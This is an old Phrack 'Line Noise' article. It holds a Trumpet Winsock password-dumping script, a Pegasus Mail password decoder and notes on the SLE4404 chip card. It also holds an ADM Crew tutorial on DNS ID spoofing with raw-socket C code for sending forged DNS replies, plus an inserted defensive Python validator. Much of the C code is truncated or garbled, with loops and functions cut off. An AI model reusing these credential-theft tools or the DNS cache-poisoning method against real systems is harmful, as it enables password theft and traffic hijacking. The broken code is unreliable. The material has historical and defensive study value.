---[ Phrack Magazine Volume 8, Issue 52 January 26, 1998, article 03 of 20
-------------------------[ P H R A C K 5 2 L I N E N O I S E
--------[ Various
0x1>-------------------------------------------------------------------------
Upon discovering Doctor Jeep's "Trumpet Winsock Password Hacker" in P51-03, I felt obligated to share a small piece of code that I don't like to admit that I created, far earlier than the esteemed Jeep's published work. As his requires access to a Pascal compiler and does not seem to be coded with portability in mind, the fact that my script requires Trumpet itself to run does not seem too great a hindrance. The irony is that not only is the "cipher" a simple obfuscating XOR, but that Trumpet itself will decode it for you.
<++> password.cmd
Put in Trumpet Winsock directory, run under "Dialer/Other"
Cannot currently use any file other than trumpwsk.ini,
apparently due to implementation errors in the "load" function
display \n
display "Trumpet Password Thief 1.0, 8-18-95"\n
display \n
if [load $username]
  display "username: "
  display $username\n
else
  display "ERR: cannot load username"\n
end
if [load $password]
  display "password: "
  display $password\n
else
  display "ERR: cannot load password"\n
end
display \n
<-->
- anonymous
0x2>-------------------------------------------------------------------------
Another password decoder for ya... written long ago, I just never bothered to release it...
<++> peg-dec.c
/*
 * Pegasus Mail Password Decoder v1.0 by Belgorath
 */

#include <stdio.h>
#include <stdlib.h>

/* Decoding/Encoding Tables */
int dec1[1]= { 44 };
int dec2[2]= { 16, 21 };
int dec3[3]= { 10, 22, 28 };
int dec4[4]= { 37, 28, 21, 7 };
int dec5[5]= { 21, 22, 37, 28, 9 };
int dec6[6]= { 22, 15, 28, 42, 17, 2 };
int dec7[7]= { 15, 17, 21, 31, 0, 12, 19 };
int dec8[8]= { 9, 2, 7, 20, 44, 22, 28, 23 };

int *decz[8] = { dec1,dec2,dec3,dec4,dec5,dec6,dec7,dec8 };

/* One table per password length; subtract the entry for this position */
int decode_char(int numch, int ch, int pos)
{
    ch-=decz[numch-1][pos-1];
    if(ch<-127) ch+=256;
    return ch;
}

void main(void)
{
    int zz,x,nc;
    char *tz;
    int inps[20];

    nc=0;
    tz=malloc(8192);
    printf("Enter Pegasus Mail Password: ");
    gets(tz);

    /* Fun input parsing loop. Hope your malloc bzero's... */
    while( *tz ) {
        for(x=0;x
    /* Throw away anything past the end */
    for(x=0;x
    /* All pegasus passwords end in -1 */
    if(inps[nc-1]!=-1) {
        printf("Invalid Pegasus Mail Password.\n");
        return;
    } /* But we throw it away anyway */
    nc--;
    printf("Decoded Password: [");
    for(x=1;x

0x3>-------------------------------------------------------------------------

Chip cards differ from one another in memory size, type of memory (PROM or
EEPROM), security logic and micro-controller. This article will discuss the
Siemens SLE4404 chip card technology.

The SLE4404 is employed for electronic purse cards and bank transactions,
cellular telephony (pre-paid cards), user IDs for access control, etc. (some
examples: SmartCard, ViaCard and Italian Bancomat). Its data can be accessed
through a simple TTL serial channel, providing a +5 Vcc power supply from an
external source.

Inside the chip
~~~~~~~~~~~~~~~

The chipcard has at its disposal EEPROM memory consisting of a 416-bit matrix
(each row is 16 bits) that is protected by security logic providing access
control. This is the logic diagram:

                  +-----------+     +---------+     +------------------+
 C3,C8,C2,C5 -->  | Control & |     |   Row   |     | User mem 208 bit |
 C1 (Vcc)    -->  | Security  | --> | Decoder | --> | Sec unit 192 bit |
 C7 (I/O)   <-->  |   Logic   |     |         | 26  | Special mem unit |
                  +-----------+     +---------+     +------------------+
                        ^                                    ^
                        |                                    |
                        +------------------------------------+

The SLE4404 memory is subdivided in three main memory blocks: one is read
only (a "PROM" containing the manufacturer code and/or a serial number and
an expiration date), the second is both readable and writeable (user memory)
and the last block cannot be written to unless the lock-out fuse has been
fused. This is the memory map:

 BLOCK TYPE          SIZE (BIT)  ADDRESS   READABLE  WRITEABLE  ERASEABLE
 Manufacturer code      16       0-15      Yes       No         No
 Application ROM        48       16-63     Yes       No         No
 User code              16       64-79     [fuse]    U.C.       U.C.
 Error counter           4       80-83     Yes       Yes        U.C.
 EEPROM #1              12       84-95     Yes       Yes        U.C.
 EEPROM #2              16       96-111    Yes       U.C.       U.C.
 Frame memory block
  - F.M. config          2       112-113   Yes       Yes        U.C./R.C.
  - Frame memory       206       114-319   [cfg]     [cfg]      U.C./R.C.
 Frame code             32       320-351   [fuse]    [fuse]     [cfg]

Meaning of abbreviations:

 U.C.   - User code required
          (each time the code is entered the error counter is decreased)
 R.C.   - Frame code required
          (each time the code is entered the frame counter is decreased)
 [fuse] - Operation allowed ONLY IF lock-out fuse is not fused
 [cfg]  - Operation allowed according to frame memory configuration

Frame memory configuration table:

 BIT 112  BIT 113  MEMORY MODE  READABLE  WRITEABLE

The first 16-bit block is for the Manufacturer Code. The following 48-bit
block is called Application ROM, containing another code (Manufacturer sub
code or info, serial number, sub-type of card, etc).

The User Code is the access code (PIN) used to read/write/erase memory.

Please note that access to memory is blocked after four incorrect access
trials (checked by the counter). The same goes for the Frame Code and the
Frame [error] Counter (note that the number of incorrect accesses is limited
to three trials instead of four).

Finally, the Frame Memory is generally used for storing personal user
information or the credit limit (money that can be fetched in a bank
transaction, or the remaining "virtual" credit that a pre-paid cellular card
contains).

The Pin-out
~~~~~~~~~~~

This is the Siemens SLE4404 pin-out (N.C. stands for Not Connected):

 +-------+-------------------+
 | C 1   |           | C 5   |        Contact  Pin  Info
 |       |           |       |
 +-------+           +-------+           1      6   Vcc +5V
 | C 2   |           | C 6   |           2      5   Reset
 |       |           |       |           3      4   Clock
 +-------+           +-------+           4      3   Test input - N.C.
 | C 3   |           | C 7   |           5      8   Ground
 |       |           |       |           6      7   N.C.
 +-------+           +-------+           7      1   Bi-directional I/O data line
 | C 4   |           | C 8   |           8      2   Control input (data change)
 |       |           |       |
 +-------+-----------+-------+

0x4>-------------------------------------------------------------------------
_ _ _ _
/ \ | _ \ | \ / |
| / \ | | | \ | | _/ |
| |_| | | | / | | _/ |
..oO THE | --- | | / | | | | CreW Oo..
 '''    '''  '''''''  ''''  ''''

--[1]-- DNS ID Hacking Presentation

You might be wondering what DNS ID Hacking (or Spoofing) is all about. DNS ID
Hacking isn't a usual way of hacking/spoofing such jizz or any-erect. This
method is based on a vulnerability in the DNS protocol. More brutal, the DNS ID
hack/spoof is very efficient and very strong as there is no generation of DNS
daemons that escapes from it (even WinNT!).

--[1.1]-- DNS Protocol mechanism explanation

In the first step, you must know how the DNS works. I will only explain the
most important facts of this protocol. In order to do that, we will follow
the way of a DNS request packet from A to Z!

Name resolution example:

The client (bla.bibi.com) sends a request for resolution of the domain
"www.heike.com". To resolve the name, bla.bibi.com uses "dns.bibi.com" for
DNS. Let's take a look at the following picture..

   /---------------------------------\
   | 111.1.2.123 = bla.bibi.com      |
   | 111.1.2.222 = dns.bibi.com      |
   | format:                         |
   | IPADDR:PORT->IPADDR:PORT        |
   | ex:                             |
   | 111.1.2.123:2999->111.1.2.222:53|
   \---------------------------------/

 ...
 gethostbyname("www.heike.com");
 ...

 [bla.bibi.com]                                  [dns.bibi.com]
 111.1.2.123:1999 ---> [?www.heike.com] ------> 111.1.2.222:53

Here we see our name resolution request from source port 1999, which is asking
the DNS on port 53 (note: DNS is always on port 53). Now that dns.bibi.com has
received the resolution request from bla.bibi.com, dns.bibi.com will have to
resolve the name:

 [dns.bibi.com]                                      [ns.internic.net]
 111.1.2.222:53 --------> [dns?www.heike.com] ----> 198.41.0.4:53

dns.bibi.com asks ns.internic.net who the root name server for the address
of www.heike.com is, and if it doesn't have it, it sends the request to a name
server which has authority on '.com' domains (note: we send a request to the
Internic because it could have this request in its cache).

 [ns.internic.net]                                       [ns.bibi.com]
 198.41.0.4:53 ------> [ns for.com is 144.44.44.4] ------> 111.1.2.222:53

Here we can see that ns.internic.net answered to ns.bibi.com (which is the DNS
that has authority over the domain bibi.com) that the name server of for.com
has the IP 144.44.44.4 (let's call it ns.for.com). Now our ns.bibi.com will
ask ns.for.com for the address of www.heike.com, but this one doesn't have
it and will forward the request to the DNS of heike.com which has authority
for heike.com.

 [ns.bibi.com]                                 [ns.for.com]
 111.1.2.222:53 ------> [?www.heike.com] -----> 144.44.44.4:53

The answer from ns.for.com:

 [ns.for.com]                                             [ns.bibi.com]
 144.44.44.4:53 ------>[ns for heike.com is 31.33.7.4] ---> 144.44.44.4:53

Now that we know which IP address has authority on the domain "heike.com"
(we'll call it ns.heike.com), we ask it what's the IP of the machine
www.heike.com.

 [ns.bibi.com]                               [ns.heike.com]
 111.1.2.222:53 -----> [?www.heike.com] ----> 31.33.7.4:53

We now have our answer:

 [ns.heike.com]                                            [ns.bibi.com]
 31.33.7.4:53 -------> [www.heike.com == 31.33.7.44] ----> 111.1.2.222:53

Great, we have the answer, we can forward it to our client bla.bibi.com.

 [ns.bibi.com]                                               [bla.bibi.com]
 111.1.2.222:53 -------> [www.heike.com == 31.33.7.44] ----> 111.1.2.123:1999

Now bla.bibi.com knows the IP of www.heike.com.

Now let's imagine that we'd like to have the name of a machine from its IP; in
order to do that, we proceed a bit differently as the IP will have to be
transformed.

Reverse name lookup resolution:

 100.20.40.3 will become 3.40.20.100.in-addr.arpa

This method is only for the IP resolution request (reverse DNS).

Let's look at a practical example where we take the IP address of
www.heike.com (31.33.7.44 or "44.7.33.31.in-addr.arpa" after the translation
into a format comprehensible to DNS).

 ...
 gethostbyaddr("31.33.7.44");
 ...

We send our request to ns.bibi.com:

 [bla.bibi.com]                                            [ns.bibi.com]
 111.1.2.123:2600 -----> [?44.7.33.31.in-addr.arpa] -----> 111.1.2.222:53

Which is forwarded to ns.internic.net:

 [ns.bibi.com]                                           [ns.internic.net]
 111.1.2.222:53 -----> [?44.7.33.31.in-addr.arpa] ------> 198.41.0.4:53

ns.internic.net will send the IP of a name server which has authority on
'31.in-addr.arpa'.

 [ns.internic.net]                                               [ns.bibi.com]
 198.41.0.4:53 --> [DNS for 31.in-addr.arpa is 144.44.44.4] -> 111.1.2.222:53

Now ns.bibi.com will ask the same question to the DNS at 144.44.44.4:

 [ns.bibi.com]                                          [ns.for.com]
 111.1.2.222:53 ----->[?44.7.33.31.in-addr.arpa]------> 144.44.44.4:53

And so on. The mechanism is nearly the same as that used for name resolution.

--[1.2]-- DNS packet header

Here is the format of a DNS message:
+---------------------------+---------------------------+
| ID (the famous :) | flags |
+---------------------------+---------------------------+
| numbers of questions | numbers of answer |
+---------------------------+---------------------------+
| number of RR authority |number of supplementary RR |
+---------------------------+---------------------------+
| |
\ \
\ QUESTION \
| |
+-------------------------------------------------------+
| |
\ \
\ ANSWER \
| |
+-------------------------------------------------------+
| |
\ \
\ Stuff etc.. No matter \
| |
+-------------------------------------------------------+

--[1.3]-- Structure of DNS packets.

ID

The ID permits us to identify each DNS packet, since exchanges between name
servers are from port 53 to port 53, and moreover there might be more than one
request at a time, so the ID is the only way to recognize the different DNS
requests. We'll talk about it later..

flags

The flags area is divided into several parts:

   [QR | opcode | AA | TC | RD | RA | zero | rcode ]
     |      |     |    |    |    |     |       |_ 4 bits
     |      |     |    |    |    |     |_________ 3 bits
     |      |     |    |    |    |_______________ 1 bit
     |      |     |    |    |____________________ 1 bit
     |      |     |    |_________________________ 1 bit
     |      |     |______________________________ 1 bit
     |      |____________________________________ 4 bits
     |___________________________________________ 1 bit

QR     = If the QR bit = 0, it means that the packet is a question, otherwise
         it's an answer.

opcode = The value is 0 for a normal request, 1 for a reverse request, and
         2 for a status request (we don't need to know all these modes).

AA     = If it's equal to 1, it says that the name server has an authoritative
         answer.

TC     = No matter

RD     = If this flag is set to 1, it means "Recursion Request"; for example when
         bla.bibi.com asks ns.bibi.com to resolve the name, the flag tells the
         DNS to assume this request.

RA     = If it's set to 1, it means that recursion is available. This bit is
         set to 1 in the answer of the name server if it supports recursion.

Zero   = Here are three zeroes...

rcode  = It contains the return error messages for DNS requests: if 0, it means
         "no error", 3 means "name error".

The 2 following flags don't have any importance for us.

DNS QUESTION:

Here is the format of a DNS question:

 +-----------------------------------------------------------------------+
 |                         name of the question                          |
 +-----------------------------------------------------------------------+
 |        type of question        |            type of query             |
 +--------------------------------+--------------------------------------+

The structure of the question is like this. Example:

 www.heike.com will be [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]

For an IP address, the format remains the same. 44.33.88.123.in-addr.arpa
would be:

 [2|4|4|2|3|3|2|8|8|3|1|2|3|7|i|n|-|a|d|d|r|4|a|r|p|a|0]

[note]: a compression format exists, but we won't cover it.

type of question:

Here are the values that we will use most of the time (there are many more,
but these are the only relevant ones):

     name   value
     A    |   1   | IP Address (resolving a name to an IP)
     PTR  |  12   | Pointer (resolving an IP to a name)

type of query:

The values are the same as the type of question.

DNS ANSWER:

Here is the format of an answer (an RR):

 +------------------------------------------------------------------------+
 |                           name of the domain                           |
 +------------------------------------------------------------------------+
 |              type                |               class                 |
 +----------------------------------+-------------------------------------+
 |                           TTL (time to live)                           |
 +------------------------------------------------------------------------+
 |      resource data length        |                                     |
 |----------------------------------+                                     |
 |                            resource data                               |
 +------------------------------------------------------------------------+

name of the domain:

The name of the domain the following resource refers to. The domain name is
stored in the same way as in the question part; for the resolution request of
www.heike.com, the field "name of the domain" will contain
[3|w|w|w|5|h|e|i|k|e|3|c|o|m|0].

type:

The type field is the same as "type of query" in the question part of the
packet.

class:

The class field is equal to 1 for Internet data.

time to live:

This field gives, in seconds, the lifetime of the information in the
name server cache.

resource data length:

The length of resource data; for example, if resource data length is 4, it
means that the data in resource data is 4 bytes long.

resource data:

I will offer you a little example that explains this better:

Here is what's happening when ns.bibi.com asks ns.heike.com for
www.heike.com's address

 ns.bibi.com:53 ---> [?www.heike.com] ----> ns.heike.com:53   (Phear Heike ;)

+---------------------------------+--------------------------------------+
| ID = 1999 | QR = 0 opcode = 0 RD = 1 |
+---------------------------------+--------------------------------------+
| numbers of questions = htons(1) | numbers of answers = 0 |
+---------------------------------+--------------------------------------+
| number of RR authoritative = 0 | number of supplementary RR = 0 |
+---------------------------------+--------------------------------------+
here is for the question. now let's stare the answer of ns.heike.com ns.heike.com:53 -->[IP of www.heike.com is 31.33.7.44] --> ns.bibi.com:53 +---------------------------------+---------------------------------------+
| ID = 1999 | QR=1 opcode=0 RD=1 AA =1 RA=1 |
+---------------------------------+---------------------------------------+
| numbers of questions = htons(1) | numbers of answers = htons(1) |
+---------------------------------+---------------------------------------+
| number of RR authoritative = 0 | number of supplementary RR = 0 |
+---------------------------------+---------------------------------------+
+-------------------------------------------------------------------------+
| name of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] |
+-------------------------------------------------------------------------+
| type of question = htons(1) | type of query = htons(1) |
+-------------------------------------------------------------------------+
+-------------------------------------------------------------------------+
| name of the domain = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] |
+-------------------------------------------------------------------------+
| type = htons(1) | class = htons(1) |
+-------------------------------------------------------------------------+
| time to live = 999999 |
+-------------------------------------------------------------------------+
| resource data length = htons(4) | resource data=inet_addr("31.33.7.44") |
+-------------------------------------------------------------------------+

Yah! That's all for now :)) Here is an analysis:

In the answer QR = 1 because it's an answer :)
AA = 1 because the name server has authority in its domain
RA = 1 because recursion is available

Good =) I hope you understood that, because you will need it for the following
events.

--[2.0]-- DNS ID hack/spoof

Now it's time to explain clearly what DNS ID hacking/spoofing is.
Like I explained before, the only way for the DNS daemon to recognize
the different questions/answers is the ID flag in the packet. Look at this
example:

 ns.bibi.com:53 ----->[?www.heike.com] ------> ns.heike.com:53

So you only have to spoof the IP of ns.heike.com and answer your false
information before ns.heike.com does, to ns.bibi.com!

 ns.bibi.com <------- . . . . . . . . . . . ns.heike.com
    |
    |<--[IP for www.heike.com is 1.2.3.4]<-- hum.roxor.com

But in practice you have to guess the right ID :) If you are on a LAN, you
can sniff to get this ID and answer before the name server (it's easy on a
local network :)

If you want to do this remotely you don't have a lot of choices, you only
have 4 basic methods:

1.) Randomly test all the possible values of the ID flag. You must answer
    before the ns! (ns.heike.com in this example). This method is obsolete
    unless you want to know the ID .. or any other favorable condition to
    its prediction.

2.) Send some DNS requests (200 or 300) in order to increase the chances
    of falling on the right ID.

3.) Flood the DNS in order to avoid its work. The name server will crash
    and show the following error!

4.) Or you can use the vulnerability in BIND discovered by SNI (Secure
    Networks, Inc.) with ID prediction (we will discuss this in a bit).

I found a heavy vulnerability in Windows 95 (I haven't tested it on
WinNT); let's imagine my little friend that's on Windows 95.
Windows IDs are extremely easy to predict because it's "1" by default :)))
and "2" for the second question (if there are 2 questions at the same time).

There is a vulnerability in BIND (discovered by SNI as stated earlier).
In fact, DNS IDs are easily predictable, you only have to sniff a DNS in
order to do what you want. Let me explain...

The DNS uses a random ID at the beginning but it only increases this ID for
the next questions ... =))) It's easy to exploit this vulnerability.
Here is the way:

Be able to sniff easily the messages that come to a random DNS (ex.
ns.dede.com for this sample).

You ask NS.victim.com to resolve (random).dede.com. NS.victim.com will
ask ns.dede.com to resolve (random).dede.com

 ns.victim.com ---> [?(rand).dede.com ID = 444] ---> ns.dede.com

Now you have the ID of the message from NS.victim.com, now you know what
ID area you'll have to use. (ID = 444 in this sample).

You then make your resolution request. ex. www.microsoft.com to
NS.victim.com

 (you) ---> [?www.microsoft.com] ---> ns.victim.com

 ns.victim.com --> [?www.microsoft.com ID = 446 ] --> ns.microsoft.com

Flood the name server ns.victim.com with the ID (444) you already have and
then you increase this one.

 ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 444] --> ns.victim.com
 ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 445] --> ns.victim.com
 ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 446] --> ns.victim.com
 ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 447] --> ns.victim.com
 ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 448] --> ns.victim.com
 ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 449] --> ns.victim.com

(now you know that DNS IDs are predictable, and they only increase. You
flood ns.victim.com with spoofed answers with the ID 444+ ;)

* ADMsnOOfID does this.

There is another way to exploit this vulnerability without root on
any DNS. The mechanism is very simple. Here is the explanation:

We send to ns.victim.com a resolution request for *.provnet.fr

 (you) ----------[?(random).provnet.fr] -------> ns.victim.com

Then, ns.victim.com asks ns1.provnet.fr to resolve (random).provnet.fr.
There is nothing new here, but the interesting part begins here.

From this point you begin to flood ns.victim.com with spoofed answers
(with ns1.provnet.fr's IP) with IDs from 100 to 110...

 (spoof) ----[(random).provnet.fr is 1.2.3.4 ID=100] --> ns.victim.com
 (spoof) ----[(random).provnet.fr is 1.2.3.4 ID=101] --> ns.victim.com
 (spoof) ----[(random).provnet.fr is 1.2.3.4 ID=102] --> ns.victim.com
 (spoof) ----[(random).provnet.fr is 1.2.3.4 ID=103] --> ns.victim.com
 .....

After that, we ask ns.victim.com if (random).provnet.fr has an IP.

If ns.victim.com gives us an IP for (random).provnet.fr then we have
found the correct ID :) Otherwise we have to repeat this attack until we
find the ID. It's a bit long but it's effective. And nothing forbids you
to do this with friends ;)

This is how ADMnOg00d works ;)

Here you will find 5 programs

 ADMkillDNS  - very simple DNS spoofer
 ADMsniffID  - sniff a LAN and reply false DNS answers before the NS
 ADMsnOOfID  - a DNS ID spoofer (you'll need to be root on a NS)
 ADMnOg00d   - a DNS ID predictor (no need to be root on a NS)
 ADNdnsfuckr - a very simple denial of service attack to disable DNS

Have fun!! :)
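The message layout of sections 1.2/1.3 and the ID matching that section 2.0 turns on, as an added example (my own code, not part of the article or of the ADM tools): a small encoder/parser for the header, the [3|w|w|w|...|0] name form and the in-addr.arpa reverse name, plus the checks a resolver has to apply before it trusts a reply. The names PendingQuery, accept_reply and demo are my own, the ns.heike.com/ns.bibi.com scenario is constructed from the article, and the resolver side is assumed to randomise both the ID and the source port, which is what makes a guessed or predicted ID alone insufficient.

```python
import random
import struct

TYPE_A, TYPE_PTR, CLASS_IN = 1, 12, 1  # type values from the article's table
FLAGS_QUERY = 0x0100                    # QR=0 opcode=0 RD=1 (the question above)
FLAGS_AUTH_ANSWER = 0x8580              # QR=1 AA=1 RD=1 RA=1 (ns.heike.com's answer)

def encode_name(name):
    """www.heike.com -> [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]; no compression."""
    out = b""
    for label in name.rstrip(".").split("."):
        if not 0 < len(label) < 64:
            raise ValueError("bad label length: %r" % label)
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"

def reverse_name(ip):
    """100.20.40.3 -> 3.40.20.100.in-addr.arpa, the PTR question name."""
    return ".".join(reversed(ip.split("."))) + ".in-addr.arpa"

def decode_name(msg, off):
    """Read an uncompressed name at msg[off:]; returns (name, next offset)."""
    labels = []
    while True:
        n = msg[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        if n & 0xC0:  # compression pointer: the article skips it, so do we
            raise ValueError("compressed name")
        labels.append(msg[off:off + n].decode("ascii"))
        off += n

def build_query(txid, name, qtype):
    """Header (6 x 16 bit) + one question: name, type, class."""
    hdr = struct.pack("!HHHHHH", txid, FLAGS_QUERY, 1, 0, 0, 0)
    return hdr + encode_name(name) + struct.pack("!HH", qtype, CLASS_IN)

def build_answer(txid, name, qtype, rdata, ttl=999999):
    """Authoritative reply: question echoed back, then one RR carrying rdata."""
    hdr = struct.pack("!HHHHHH", txid, FLAGS_AUTH_ANSWER, 1, 1, 0, 0)
    q = encode_name(name) + struct.pack("!HH", qtype, CLASS_IN)
    rr = encode_name(name) + struct.pack("!HHIH", qtype, CLASS_IN, ttl, len(rdata))
    return hdr + q + rr + rdata

def parse_message(msg):
    """Parse header, question and answer sections (authority/additional ignored)."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    off, questions, answers = 12, [], []
    for _ in range(qd):
        name, off = decode_name(msg, off)
        qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
        off += 4
        questions.append((name, qtype, qclass))
    for _ in range(an):
        name, off = decode_name(msg, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        answers.append((name, rtype, rclass, ttl, msg[off:off + rdlen]))
        off += rdlen
    return {"id": txid, "qr": flags >> 15, "aa": (flags >> 10) & 1,
            "rcode": flags & 0xF, "questions": questions, "answers": answers}

class PendingQuery:
    """What a resolver remembers for an outstanding question (hypothetical name)."""
    def __init__(self, server_ip, name, qtype):
        self.server_ip, self.name, self.qtype = server_ip, name, qtype
        self.txid = random.randrange(1, 0x10000)      # random, not "1" or a counter
        self.sport = random.randrange(1024, 0x10000)  # random source port, not 53
        self.wire = build_query(self.txid, name, qtype)

def accept_reply(pending, src_ip, src_port, dst_port, msg):
    """(accepted, reason): a reply is trusted only if every field matches."""
    if (src_ip, src_port, dst_port) != (pending.server_ip, 53, pending.sport):
        return False, "addressing does not match the outstanding query"
    try:
        reply = parse_message(msg)
    except (ValueError, IndexError, struct.error):
        return False, "malformed"
    if reply["qr"] != 1 or reply["id"] != pending.txid:
        return False, "not an answer, or ID mismatch"
    if reply["questions"] != [(pending.name, pending.qtype, CLASS_IN)]:
        return False, "question section differs from what was asked"
    for name, rtype, _cls, _ttl, _rdata in reply["answers"]:
        if name != pending.name or rtype != pending.qtype:
            return False, "answer RR is not for the name/type asked"
    return True, "ok"

def demo():
    """Constructed scenario from the article: ns.bibi.com asks ns.heike.com."""
    pending = PendingQuery("31.33.7.4", "www.heike.com", TYPE_A)
    genuine = build_answer(pending.txid, "www.heike.com", TYPE_A, bytes([31, 33, 7, 44]))
    # A reply whose ID was guessed wrong: rejected even though everything else fits
    forged = build_answer(pending.txid ^ 1, "www.heike.com", TYPE_A, bytes([1, 2, 3, 4]))
    return (accept_reply(pending, "31.33.7.4", 53, pending.sport, genuine)[0],
            accept_reply(pending, "31.33.7.4", 53, pending.sport, forged)[0])
```

With a 16-bit random ID and a random source port, an off-path reply has to match both, which is the property the fixed ("1") and incrementing IDs described above lack.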
Note: You can find source and binaries of these progs at
ftp.janova.org/pub/ADM. I'm going to make a little HOWTO soon, which would
be on janova. You need to install libpcap on your machine before any
compilation of the ADMID proggies :)

ADM Crew.

Thanks to: all ADM crew, Shok, pirus, fyber, Heike, and w00w00 (gotta love
these guys)
Special Thanks: ackboo, and of course Secure Networks, Inc. (SNI) at
www.secnet.com for finding the vulnerability =)

<++> ADMIDpack/ADM-spoof.c
/************************/
/* ADM spoofing routine */
/*    for spoof udp     */
/************************/

/************************/
/*
 * in_cksum --
 *  Checksum routine for Internet Protocol family headers (C Version)
 */
/************************/

unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;
}

int udp_send(s,saddr,daddr,sport,dport,datagram,datasize)
{
    struct sockaddr_in sin;
    struct iphdr *ip;
    struct udphdr *udp;
    unsigned char *data;
    unsigned char packet[4024];
    int x;

    ip = (struct iphdr *)packet;
    udp = (struct udphdr *)(packet+IPHDRSIZE);
    data = (unsigned char *)(packet+IPHDRSIZE+UDPHDRSIZE);
    memset(packet,0,sizeof(packet));
    return(x);
}

/************************/
/* RECV PAKET           */
/* get_pkt(socket, buffer , size of the buffer); */
/************************/

int get_pkt(s,data,size)
int s;
unsigned char *data;
int size;
{
    struct sockaddr_in sin;
    int len,resu;
    len= sizeof(sin);
    resu=recvfrom(s,data,size,0,(struct sockaddr *)&sin,&len);
    return resu;
}

int myrand()
{
    int j;
    j=1+(int) (150.0*rand()/(RAND_MAX+1.0));
    return(j);
}

unsigned long host2ip(char *serv)
{
    struct sockaddr_in sinn;
    struct hostent *hent;

    hent=gethostbyname(serv);
    if(hent == NULL) return 0;
    bzero((char *)&sinn, sizeof(sinn));
    bcopy(hent->h_addr, (char *)&sinn.sin_addr, hent->h_length);
    return sinn.sin_addr.s_addr;
}

void nameformat(char *name,char *QS)
{
    /* CRAP & LAme COde :) */
    char lol[3000];
    char tmp[2550];
    char tmp2[2550];
    int i,a=0;
    bzero(lol,sizeof(lol));
    bzero(tmp,sizeof(tmp));
    bzero(tmp2,sizeof(tmp2));
    for(i=0;i
    sprintf(tmp2,"%c%s",a,tmp);
    strcat(lol,tmp2);
    strcpy(QS,lol);
}

void nameformatIP(char *ip, char *resu)
{
    char *arpa = "in-addr.arpa";
    char bla[255];
    char arf[255];
    char haha[255];
    char c;
    char *A[4];
    int i,a=3,k=0;

    bzero(bla,sizeof(bla));
    bzero(arf,sizeof(arf));
    bzero(haha,sizeof(haha));
    for(i=0;i<4;i++){
        A[i] =(char *)malloc(4);
        bzero(A[i],4);
    }
    bzero(bla,sizeof(bla));
    bzero(arf,sizeof(arf));
    for(i=0;i
    strcat(A[a],arf);
    for(i=0;i<4;i++){
        strcat(bla,A[i]);
        strcat(bla,".");
    }
    strcat(bla,arpa);
    nameformat(bla,haha);
    strcpy(resu,haha);
}

int makepaketQS(char *data,char *name,int type)
{
    if(type == TYPE_A ){
        nameformat(name,data);
        *( (u_short *) (data+strlen(data)+1) ) = htons(TYPE_A);
    }
    if(type == TYPE_PTR){
        nameformatIP(name,data);
        *( (u_short *) (data+strlen(data)+1) ) = htons(TYPE_PTR);
    }
    *( (u_short *) (data+strlen(data)+3) ) = htons(1);
    return(strlen(data)+5);
}

int makepaketAW(char *data,char *name, char *ip,int type)
{
    int i;
    char tmp[2550];
    bzero(tmp,sizeof(tmp));
    if( type == TYPE_A ){
        nameformat(name,data);
        *( (u_short *) (data+strlen(data)+1) ) = htons(1);
        *( (u_short *) (data+strlen(data)+3) ) = htons(1);
    if( type == TYPE_PTR ){
        nameformat(name,tmp);
        nameformatIP(ip,data);
        *( (u_short *) (data+strlen(data)+1) ) = htons(TYPE_PTR);
        *( (u_short *) (data+strlen(data)+3) ) = htons(1);

void sendquestion(u_long s_ip, u_long d_ip,char *name,int type)
{
    struct dnshdr *dns;
    char buff[1024];
    char *data;
    int i;
    int on=1;
    int sraw;

    if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
        perror("socket");
        exit(ERROR);
    }
    if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
        perror("setsockopt");
        exit(ERROR);
    }
    dns = (struct dnshdr *) buff;
    data = (char *)(buff+DNSHDRSIZE);
    bzero(buff,sizeof(buff));
    dns->id = 6000+myrand();
    dns->qr = 0;
    dns->rd = 1;
    dns->aa = 0;
    dns->quenum = htons(1);
    dns->repnum = htons(0);
    i=makepaketQS(data,name,type);
    udp_send(sraw,s_ip,d_ip,1200+myrand(),53,buff,DNSHDRSIZE+i);
    close(sraw);

void sendawnser(u_long s_ip, u_long d_ip, char *name,char *spoofip,int ID,int type)
{
    struct dnshdr *dns;
    char buff[1024];
    char *data;
    int i;
    int on=1;
    int sraw;

    if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
        perror("socket");
        exit(ERROR);
    }
    if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
        perror("setsockopt");
        exit(ERROR);
    }
    dns = (struct dnshdr *) buff;
    data = (char *)(buff+DNSHDRSIZE);
    bzero(buff,sizeof(buff));
    dns->id = htons(ID);
    dns->qr = 1;
    dns->rd = 1;
    dns->aa = 1;
    dns->quenum = htons(1);
    dns->repnum = htons(1);
    i=makepaketAW(data,name,spoofip,type);
    printf(" I apres Makepaket == %i \n",i);
    udp_send(sraw,s_ip,d_ip,53,53,buff,DNSHDRSIZE+i);
    close(sraw);
}

void dnsspoof(char *dnstrust,char *victim,char *spoofname,char *spoofip,int ID,int type)
{
    struct dnshdr *dns;
    char buff[1024];
    char *data;
    u_long fakeip;
    u_long trustip;
    u_long victimip;
    int loop,rere;

    if( type == TYPE_PTR)
        for(loop=0;loop<4;loop++)sendquestion(fakeip,victimip,spoofip,type);
    if( type == TYPE_A)
        for(loop=0;loop<4;loop++)
            sendquestion(fakeip,victimip,spoofname,type);
<-->
